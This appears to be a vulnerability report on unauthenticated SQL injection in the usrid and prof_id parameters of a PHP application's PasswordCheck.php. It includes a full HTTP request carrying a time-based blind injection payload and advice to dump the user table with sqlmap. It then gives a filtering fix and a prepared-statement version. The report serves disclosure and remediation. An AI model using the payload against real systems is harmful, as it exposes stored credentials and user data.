Because of a lack of sanitization of the input data at the two parameters `$_GET['usrid']` and `$_GET['prof_id']` in the PasswordCheck.php file, an unauthenticated user can inject SQL code and get all information in the database.
Use the sqlmap tool to dump the users of the database.
To Reproduce
SQL INJECTION
Steps to reproduce the behavior:
1. Access the PasswordCheck.php file.
2. Append `?password=P@a&usrid=[inject sql code in here]&prof_id=[inject sql code in here]` after PasswordCheck.php in the URL.
Request
```http
GET /PasswordCheck.php?password=P@a&usrid=1&prof_id=1%27%20AND%20(SELECT%209714%20FROM%20(SELECT(SLEEP(5)))vGYX)--%20- HTTP/1.1
Host: 172.16.0.12:2222
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=bcq1n5bpstl0b93h22v51uv2sc
Upgrade-Insecure-Requests: 1
```
Solution:
Use the sqlSecurityFilter() function in functions/SqlSecurityFnc.php:
```php
// Load the project's filtering helper and apply it to the string parameter.
include("functions/SqlSecurityFnc.php");
$usrid = sqlSecurityFilter($_GET['usrid']);
// prof_id is coerced with intval(), so only an integer is concatenated into the query.
// The password only reaches the query through md5(), whose hex output carries no SQL metacharacters.
$res_pass_chk = DBGet(DBQuery("SELECT * FROM login_authentication WHERE PASSWORD = '".md5($_GET['password'])."' AND USERNAME!='".$usrid."' AND PROFILE_ID!='".intval($_GET['prof_id'])."'"));
```
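As an added example (not the project's code and not the fix proposed above), the same check written with a PDO prepared statement, so that neither parameter is concatenated into the SQL text at all. The table and column names are taken from the query in the report; the `password_check()` function name, the PDO DSN and the credentials are assumptions.

```php
<?php
// Added example: PasswordCheck query with bound parameters instead of string
// concatenation. Table/column names come from the report's query; the function
// name, DSN and credentials below are assumptions.

function password_check(PDO $pdo, string $password, string $usrid, string $profId): array
{
    // Same treatment the report proposes for prof_id: coerce to an integer.
    // For the report's payload ("1' AND (SELECT ... SLEEP(5) ...)-- -")
    // intval() returns 1, so only that number is ever sent to the database.
    $profIdInt = intval($profId);

    // md5() is kept only to match the hash format the application stores;
    // it is not part of the injection fix.
    $passwordHash = md5($password);

    // Named placeholders: the driver sends the values separately from the SQL
    // text, so quotes or comment sequences in $usrid cannot alter the statement.
    $stmt = $pdo->prepare(
        'SELECT * FROM login_authentication
          WHERE PASSWORD = :pass AND USERNAME != :usrid AND PROFILE_ID != :prof_id'
    );
    $stmt->bindValue(':pass', $passwordHash, PDO::PARAM_STR);
    $stmt->bindValue(':usrid', $usrid, PDO::PARAM_STR);
    $stmt->bindValue(':prof_id', $profIdInt, PDO::PARAM_INT);
    $stmt->execute();

    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage with assumed connection details. Emulated prepares are disabled so the
// MySQL server itself parses the statement before any value is bound.
$pdo = new PDO('mysql:host=localhost;dbname=app', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$rows = password_check(
    $pdo,
    $_GET['password'] ?? '',
    $_GET['usrid'] ?? '',
    $_GET['prof_id'] ?? ''
);
```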